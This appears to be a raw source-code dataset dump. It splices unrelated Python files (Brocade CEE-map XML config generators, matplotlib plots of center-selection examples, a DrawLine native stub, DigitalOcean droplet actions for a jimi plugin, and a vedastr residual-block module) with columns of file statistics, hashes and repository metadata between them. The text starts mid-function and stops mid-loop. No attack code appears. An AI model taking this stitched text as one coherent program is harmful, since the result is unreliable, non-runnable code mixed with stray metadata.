name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID_key = ET.SubElement(priority_group_table, "PGID")
PGID_key.text = kwargs.pop('PGID')
pfc = ET.SubElement(priority_group_table, "pfc")
pfc.text = kwargs.pop('pfc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos0_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos0_pgid = ET.SubElement(priority_table, "map-cos0-pgid")
map_cos0_pgid.text = kwargs.pop('map_cos0_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos1_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos1_pgid = ET.SubElement(priority_table, "map-cos1-pgid")
map_cos1_pgid.text = kwargs.pop('map_cos1_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos2_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos2_pgid = ET.SubElement(priority_table, "map-cos2-pgid")
map_cos2_pgid.text = kwargs.pop('map_cos2_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos3_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos3_pgid = ET.SubElement(priority_table, "map-cos3-pgid")
map_cos3_pgid.text = kwargs.pop('map_cos3_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos4_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos4_pgid = ET.SubElement(priority_table, "map-cos4-pgid")
map_cos4_pgid.text = kwargs.pop('map_cos4_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos5_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos5_pgid = ET.SubElement(priority_table, "map-cos5-pgid")
map_cos5_pgid.text = kwargs.pop('map_cos5_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos6_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos6_pgid = ET.SubElement(priority_table, "map-cos6-pgid")
map_cos6_pgid.text = kwargs.pop('map_cos6_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos7_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos7_pgid = ET.SubElement(priority_table, "map-cos7-pgid")
map_cos7_pgid.text = kwargs.pop('map_cos7_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_remap_fabric_priority_fabric_remapped_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
remap = ET.SubElement(cee_map, "remap")
fabric_priority = ET.SubElement(remap, "fabric-priority")
fabric_remapped_priority = ET.SubElement(fabric_priority, "fabric-remapped-priority")
fabric_remapped_priority.text = kwargs.pop('fabric_remapped_priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_remap_lossless_priority_lossless_remapped_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
remap = ET.SubElement(cee_map, "remap")
lossless_priority = ET.SubElement(remap, "lossless-priority")
lossless_remapped_priority = ET.SubElement(lossless_priority, "lossless-remapped-priority")
lossless_remapped_priority.text = kwargs.pop('lossless_remapped_priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| 44.050575
| 99
| 0.640486
| 2,395
| 19,162
| 4.897704
| 0.022547
| 0.09156
| 0.052856
| 0.089003
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0
| 0.005393
| 0.225916
| 19,162
| 435
| 100
| 44.050575
| 0.785411
| 0.047855
| 0
| 0.987013
| 1
| 0
| 0.172803
| 0.070757
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100649
| false
| 0
| 0.003247
| 0
| 0.204545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5b566eccead40e43a943159762dfe8964dd6a3ef
| 5,261
|
py
|
Python
|
w4_center_selection_problem.py
|
RadarSun/Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | 4
|
2021-09-06T08:25:09.000Z
|
2021-10-15T13:03:03.000Z
|
w4_center_selection_problem.py
|
RadarSun/SUSTech-Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | null | null | null |
w4_center_selection_problem.py
|
RadarSun/SUSTech-Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | null | null | null |
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [3,8]
# y_c = [3,8]
# x_s = [4,5,7]
# y_s = [4,5,7]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# # plt.title('r(C) = ')
# plt.grid()
# plt.show()
# # use for example1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,6]
# y_c = [2,6]
# x_s = [1,3,5]
# y_s = [1,3,5]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,8))
# plt.yticks(range(0,8))
# # plt.title('r(C) = ')
# plt.grid()
# plt.show()
# # example2.1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,1,11]
# y_c = [2,11,1]
# x_s = [1,2,2,3, 1,2,10,11]
# y_s = [2,3,1,2, 10,11,1,2]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# plt.grid()
# plt.show()
# # example 2.2
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [1,2,11]
# y_c = [2,11,1]
# x_s = [2,2,2,3, 1,1,10,11]
# y_s = [2,3,1,2, 10,11,1,2]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# plt.grid()
# plt.show()
# # use for old example1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [4,4]
# y_c = [5,3-3**0.5]
# x_s = [4,3,5]
# y_s = [6,3,3]
# # x_s = [4,3,5,4,4]
# # y_s = [5,3,3,6,3-3**0.5]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,9))
# plt.yticks(range(0,9))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.0
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_s = [1,1,3,3, 2, 6,6,8,8, 7]
# y_s = [1,3,1,3, 2, 6,8,6,8, 7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.1 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,7]
# y_c = [2,7]
# x_s = [1,1,3,3, 6,6,8,8]
# y_s = [1,3,1,3, 6,8,6,8]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.2 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,8]
# y_c = [2,8]
# x_s = [1,1,3,3, 6,6,8,7]
# y_s = [1,3,1,3, 6,8,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.3 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [1,8]
# y_c = [3,8]
# x_s = [1,2,3,3, 6,6,8,7]
# y_s = [1,2,1,3, 6,8,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.0 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_s = [3,4,6,7]
# y_s = [3,4,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.1 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [3,7]
# y_c = [3,7]
# x_s = [4,6]
# y_s = [4,6]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.2 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [4,7]
# y_c = [4,7]
# x_s = [3,6]
# y_s = [3,6]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# example3.0
import numpy as np
import matplotlib.pyplot as plt
plt.figure(figsize=(8, 8))
x_s = [2,2,2,3,1, 4,5,6, 9,8,9]
y_s = [2,1,3,2,2, 5,5,5, 9,9,8]
plt.scatter(x_s,y_s,s=300,c='blue')
plt.xticks(range(0,11))
plt.yticks(range(0,11))
plt.tick_params(labelsize=30)
plt.grid()
plt.show()
# example3.1
import numpy as np
import matplotlib.pyplot as plt
plt.figure(figsize=(8, 8))
x_c = [5,9, 2]
y_c = [5,9, 1]
x_s = [2,2,3,1, 4,6, 8,9]
y_s = [2,3,2,2, 5,5, 9,8]
plt.scatter(x_s,y_s,s=300,c='blue')
plt.scatter(x_c,y_c,s=300,c='red')
plt.xticks(range(0,11))
plt.yticks(range(0,11))
plt.tick_params(labelsize=30)
plt.grid()
plt.show()
# example3.2
import numpy as np
import matplotlib.pyplot as plt
plt.figure(figsize=(8, 8))
x_c = [5,9, 2]
y_c = [5,9, 2]
x_s = [2,2,3,1, 4,6, 8,9]
y_s = [1,3,2,2, 5,5, 9,8]
plt.scatter(x_s,y_s,s=300,c='blue')
plt.scatter(x_c,y_c,s=300,c='red')
plt.xticks(range(0,11))
plt.yticks(range(0,11))
plt.tick_params(labelsize=30)
plt.grid()
plt.show()
| 22.774892
| 37
| 0.615852
| 1,175
| 5,261
| 2.654468
| 0.044255
| 0.019878
| 0.095223
| 0.072139
| 0.950625
| 0.94261
| 0.93235
| 0.923052
| 0.899647
| 0.886502
| 0
| 0.113952
| 0.137616
| 5,261
| 231
| 38
| 22.774892
| 0.573507
| 0.747386
| 0
| 0.846154
| 0
| 0
| 0.015845
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bed64824aa31dad54883a9ace71b27403f8f09a
| 361
|
py
|
Python
|
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | 4
|
2017-03-30T16:51:16.000Z
|
2020-10-05T12:25:47.000Z
|
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | null | null | null |
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | null | null | null |
def add_native_methods(clazz):
def DrawLine__sun_java2d_SunGraphics2D__sun_java2d_SurfaceData__int__int__int__int__(a0, a1, a2, a3, a4, a5, a6):
raise NotImplementedError()
clazz.DrawLine__sun_java2d_SunGraphics2D__sun_java2d_SurfaceData__int__int__int__int__ = DrawLine__sun_java2d_SunGraphics2D__sun_java2d_SurfaceData__int__int__int__int__
| 51.571429
| 173
| 0.864266
| 49
| 361
| 5.22449
| 0.408163
| 0.210938
| 0.210938
| 0.351563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0
| 0.04878
| 0.091413
| 361
| 6
| 174
| 60.166667
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5bf0c275b006c3f1cb4ac41a4e7b1e6d1162e315
| 11,621
|
py
|
Python
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | 1
|
2021-07-26T15:02:26.000Z
|
2021-07-26T15:02:26.000Z
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | 2
|
2021-06-19T14:18:07.000Z
|
2021-11-21T12:13:42.000Z
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | null | null | null |
from core.models import action
from core import auth, db, helpers
from plugins.digitalocean.includes import digitalocean
class _digitaloceanListDroplets(action._action):
apiToken = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
result = digitalocean._digitalocean(apiToken).listDroplets()
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["droplets"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 404
actionResult["msg"] = "Failed to get a valid response from virustotal API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanListDroplets, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanGetDropletByName(action._action):
apiToken = str()
dropletName = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletName = helpers.evalString(self.dropletName,{"data" : data})
result = digitalocean._digitalocean(apiToken).listDroplets(name=dropletName)
if result:
if "error" in result:
actionResult["result"] = False
actionResult["msg"] = result["msg"]
actionResult["rc"] = result["error"]
else:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["droplet"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Unable to get droplet by name, it likely does not exist"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanGetDropletByName, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanGetDroplet(action._action):
apiToken = str()
dropletID = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletID = helpers.evalString(self.dropletID,{"data" : data})
result = digitalocean._digitalocean(apiToken).getDroplet(dropletID)
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["droplet"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanGetDroplet, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanGetDropletPublicNetwork(action._action):
apiToken = str()
dropletID = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletID = helpers.evalString(self.dropletID,{"data" : data})
result = digitalocean._digitalocean(apiToken).getDroplet(dropletID,network=True)
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["droplet"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanGetDropletPublicNetwork, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanCreateDroplet(action._action):
apiToken = str()
dropletName = str()
region = str()
image = str()
size = str()
ssh_key = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletName = helpers.evalString(self.dropletName,{"data" : data})
region = helpers.evalString(self.region,{"data" : data})
image = helpers.evalString(self.image,{"data" : data})
size = helpers.evalString(self.size,{"data" : data})
ssh_key = int(helpers.evalString(self.ssh_key,{"data" : data}))
result = digitalocean._digitalocean(apiToken).createDroplet(dropletName,region,image,size,[ssh_key])
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["dropletID"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanCreateDroplet, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanDeleteDroplet(action._action):
apiToken = str()
dropletID = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletID = helpers.evalString(self.dropletID,{"data" : data})
result = digitalocean._digitalocean(apiToken).deleteDroplet(dropletID)
if result:
actionResult["result"] = True
actionResult["rc"] = 0
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanDeleteDroplet, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanWaitForDroplet(action._action):
apiToken = str()
dropletID = str()
timeout = int()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
dropletID = helpers.evalString(self.dropletID,{"data" : data})
timeout = 300
if self.timeout > 0:
timeout = self.timeout
result = digitalocean._digitalocean(apiToken).waitForDroplet(dropletID,timeout=timeout)
actionResult["result"] = result
actionResult["rc"] = 0
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanWaitForDroplet, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanListKeys(action._action):
apiToken = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
result = digitalocean._digitalocean(apiToken).listKeys()
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["keys"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanListKeys, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanGetKeyByName(action._action):
apiToken = str()
keyName = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
keyName = helpers.evalString(self.keyName,{"data" : data})
result = digitalocean._digitalocean(apiToken).listKeys(name=keyName)
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["key"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanGetKeyByName, self).setAttribute(attr,value,sessionData=sessionData)
class _digitaloceanMyBalance(action._action):
apiToken = str()
def run(self,data,persistentData,actionResult):
apiToken = auth.getPasswordFromENC(self.apiToken)
result = digitalocean._digitalocean(apiToken).getMyBalance()
if result:
actionResult["result"] = True
actionResult["rc"] = 0
actionResult["balance"] = result
else:
actionResult["result"] = False
actionResult["rc"] = 500
actionResult["msg"] = "Failed to get a valid response from API"
return actionResult
def setAttribute(self,attr,value,sessionData=None):
if attr == "apiToken" and not value.startswith("ENC "):
if db.fieldACLAccess(sessionData,self.acl,attr,accessType="write"):
self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
return True
return False
return super(_digitaloceanMyBalance, self).setAttribute(attr,value,sessionData=sessionData)
| 41.20922
| 113
| 0.637983
| 1,114
| 11,621
| 6.615799
| 0.088869
| 0.032564
| 0.054274
| 0.031208
| 0.821574
| 0.816147
| 0.777748
| 0.70787
| 0.70787
| 0.655902
| 0
| 0.005879
| 0.253507
| 11,621
| 282
| 114
| 41.20922
| 0.843689
| 0
| 0
| 0.751055
| 0
| 0
| 0.078902
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084388
| false
| 0.084388
| 0.012658
| 0
| 0.400844
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5bf9c213b3e1acc4d286e32769354b17e2db05ee
| 6,308
|
py
|
Python
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 13
|
2021-06-20T18:11:23.000Z
|
2021-12-07T18:06:42.000Z
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 9
|
2021-06-16T14:55:07.000Z
|
2021-06-23T14:45:36.000Z
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 6
|
2021-06-17T15:16:50.000Z
|
2021-07-05T20:41:26.000Z
|
from functools import partial
import torch.nn as nn
from torchvision.models.resnet import BasicBlock as BasicBlock_
from torchvision.models.resnet import Bottleneck as Bottleneck_
from torchvision.models.resnet import conv1x1
from .builder import build_module
from .norm import build_norm_layer
from .registry import UTILS
@UTILS.register_module
class BasicBlock(BasicBlock_):
def __init__(self,
inplanes,
planes,
stride=1,
downsample=None,
groups=1,
base_width=64,
dilation=1,
avg_down=False,
norm_cfg=None,
plug_cfg=None):
if norm_cfg is None:
norm_cfg = dict(type='BN')
norm_layer = partial(
build_norm_layer, norm_cfg, postfix='', layer_only=True)
super(BasicBlock, self).__init__(
inplanes=inplanes,
planes=planes,
stride=stride,
downsample=downsample,
groups=groups,
base_width=base_width,
dilation=dilation,
norm_layer=norm_layer)
if stride != 1 or inplanes != planes:
if avg_down:
self.downsample = nn.Sequential(
nn.AvgPool2d((stride, stride), stride=stride),
conv1x1(inplanes, planes * self.expansion, stride=1),
norm_layer(planes * self.expansion),
)
else:
self.downsample = nn.Sequential(
conv1x1(inplanes, planes * self.expansion, stride),
norm_layer(planes * self.expansion),
)
self.plug = build_module(plug_cfg) if plug_cfg is not None else None
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
if self.plug is not None:
out = self.plug(out)
out += identity
out = self.relu(out)
return out
@UTILS.register_module
class Bottleneck(Bottleneck_):
def __init__(self,
inplanes,
planes,
stride=1,
downsample=None,
groups=1,
base_width=64,
dilation=1,
avg_down=False,
norm_cfg=None,
plug_cfg=None):
if norm_cfg is None:
norm_cfg = dict(type='BN')
norm_layer = partial(
build_norm_layer, norm_cfg, postfix='', layer_only=True)
super(Bottleneck, self).__init__(
inplanes=inplanes,
planes=planes,
stride=stride,
downsample=downsample,
groups=groups,
base_width=base_width,
dilation=dilation,
norm_layer=norm_layer)
if stride != 1 or inplanes != planes:
if avg_down:
self.downsample = nn.Sequential(
nn.AvgPool2d((stride, stride), stride=stride),
conv1x1(self.inplanes, planes * self.expansion, stride=1),
norm_layer(planes * self.expansion),
)
else:
self.downsample = nn.Sequential(
conv1x1(self.inplanes, planes * self.expansion, stride),
norm_layer(planes * self.expansion),
)
self.plug = build_module(plug_cfg) if plug_cfg is not None else None
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
if self.plug is not None:
out = self.plug(out)
out += identity
out = self.relu(out)
return out
@UTILS.register_module
class BasicBlocks(nn.Module):
def __init__(
self,
inplanes,
planes,
stride=1,
downsample=None,
groups=1,
base_width=64,
dilation=1,
avg_down=False,
norm_cfg=None,
plug_cfg=None,
blocks=1,
):
super().__init__()
self.layers = nn.ModuleList()
self.layers.append(
BasicBlock(inplanes, planes, stride, downsample, groups,
base_width, dilation, avg_down, norm_cfg, plug_cfg))
inplanes = BasicBlock.expansion * planes
for i in range(blocks - 1):
